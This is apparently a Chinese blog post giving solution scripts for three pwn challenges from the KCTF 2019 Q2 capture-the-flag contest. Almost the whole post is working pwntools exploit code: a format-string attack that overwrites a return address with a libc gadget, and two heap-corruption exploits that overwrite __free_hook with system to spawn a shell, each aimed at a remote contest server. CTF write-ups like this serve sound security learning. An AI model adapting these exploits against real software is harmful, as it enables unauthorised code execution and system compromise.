KCTF 2019 Q2

2019-06-25 本文已影响4人 Kirin_say

好久没更东西了
前些天划了一下看雪
好像比上次水，做课设抽空做了PWN，三道都比较简单
除去课设时间，拿到题后基本都是秒的

金字塔的诅咒

from pwn import *

context.log_level="debug"
def s(note):
  p.sendlineafter("Choice:","1")
  p.sendafter("say:",note)
#p=process("./format")
p=remote("152.136.18.34",9999)
s("%3$lx")
addr=int("0x"+p.recv(8),16)
s("%5$lx")
stack_addr=int("0x"+p.recv(8),16)
s("%11$lx")
libc_addr=int("0x"+p.recv(8),16)-0xf7e13637+0xf7dfb000
print hex(addr)
print hex(stack_addr)
print hex(libc_addr)
addr=addr+0x5655700c-0x565558f3+16
stack_addr=stack_addr+0xffffcf40-0xffffcff4
s("%"+str(stack_addr&0xffff)+"c%5$hn")
s("%"+str(addr&0xffff)+"c%53$hn")
s("%"+str((stack_addr&0xffff)+2)+"c%5$hn")
s("%"+str(addr>>16)+"c%53$hn")
s("a"*12+p64(libc_addr+0x3a819))
#gdb.attach(p)
p.interactive()

绝地逃生

from pwn import *

#context.log_level="debug"
def new(index,size,note):
   p.sendlineafter(">>> ","1")
   p.sendlineafter("Index: ",str(index))
   p.sendlineafter("Size: ",str(size))
   p.sendafter("Contents: ",note)
def delete(r,num):
   p.sendlineafter(">>> ","2")
   p.sendlineafter("Index range: ",r)
   p.sendlineafter("Number of workers: ",str(num))
def show(index):
   p.sendlineafter(">>> ","3")
   p.sendlineafter("Index: ",str(index))

#p=process("./fastheap")
p=remote("152.136.18.34",10000)
for i in range(0,255):
    print i
    new(i,0x68,"kirin\n")
#gdb.attach(p)
delete("200-255",8)
show(0)
heap_addr=u64(p.recv(6)+"\x00\x00")
print hex(heap_addr)
delete("2-3","1")
delete("0-1","1")
new(200,0xf0,p64(heap_addr-0x5555557572c0+0x55555575eae0+0x10)+"\n")
new(201,0x20,"aaaa\n")
new(202,0x68,p64(heap_addr-0x5555557572c0+0x55555575eae0+0x10)+"\n")
new(203,0x68,"aaaa\n")
new(204,0x68,"aaaa\n")
new(205,0x68,"bbbb\n")
delete("200-201",1)
show(205)
libc_addr=u64(p.recv(6)+"\x00\x00")+0x7ffff77c5000-0x7ffff7bb0ca0
print hex(libc_addr)
new(211,0xf0,p64(libc_addr+0x3ed8e8)+"\n")
new(212,0x68,"/bin/sh\n")
new(213,0x68,p64(libc_addr+0x4f440)+"\n")
delete("212-213",1)
#delete("2-3",3)

p.interactive()

沉睡的敦煌

from pwn import *

context.log_level="debug"
def new(index,note):
   p.sendlineafter("4.show\n","1")
   p.sendlineafter("index:\n",str(index))
   p.sendafter("content:\n",note)
def delete(index):
   p.sendlineafter("4.show\n","2")
   p.sendlineafter("index:\n",str(index))
def edit(index,note):
   p.sendlineafter("4.show\n","3")
   p.sendlineafter("index:\n",str(index))
   p.sendafter("content:\n",note)

#p=process("./pwn")
p=remote("152.136.18.34",10001)
p.sendlineafter("4.show\n","1")
p.sendlineafter("index:\n","0")
p.recvuntil("gift: ")
heap_addr=int("0x"+p.recvuntil("\n").strip(),16)
p.sendafter("content:\n","aaaa")
for i in range(18):
    new(1+i,p64(0)+p64(0x21))
for i in range(8):
   delete(7-i)
   new(7-i,"a"*0x28+"\xf1")
delete(11)
new(11,p64(0)+p64(0x21)+p64(0x4040c0)+p64(0x4040c8)+p64(0x20)+"\xf1")
for i in range(7):
   delete(i+1)
delete(12)
new(20,"aaaa")
new(21,"aaaa")
new(25,"aaaa")
new(26,"aaaa")
new(27,"aaaa")
delete(20)
delete(21)
delete(13)
new(21,p64(heap_addr-0x4052a0+0x405260))
new(22,"aaaa")
new(23,p64(0)+p64(0x31)+p64(0x404048)+p64(0x404050)+p64(0))
delete(27)
delete(14)
delete(25)
new(14,p64(heap_addr-0x4052a0+0x405260+0x20))
new(25,"aaaa")
new(20,p64(0)*2+p64(0x30)+p64(0xf0))
delete(25)
delete(15)
delete(26)
new(30,p64(0x404170))
new(25,"aaaaaaaa")
delete(0)
new(31,p64(0x404170)*3+"a"*8)
edit(31,p64(0x404040))
p.sendlineafter("4.show\n","4")
p.sendlineafter("index:\n","30")
libc_addr=u64(p.recv(6)+"\x00\x00")+0x7ffff79e4000-0x7ffff7dd0680
print hex(libc_addr)
edit(31,p64(libc_addr+0x03ed8e8))
edit(30,p64(libc_addr+0x4f440))
edit(25,"/bin/sh\x00")
delete(25)
#gdb.attach(p)
p.interactive()

KCTF 2019 Q2

金字塔的诅咒

绝地逃生

沉睡的敦煌

猜你喜欢

热点阅读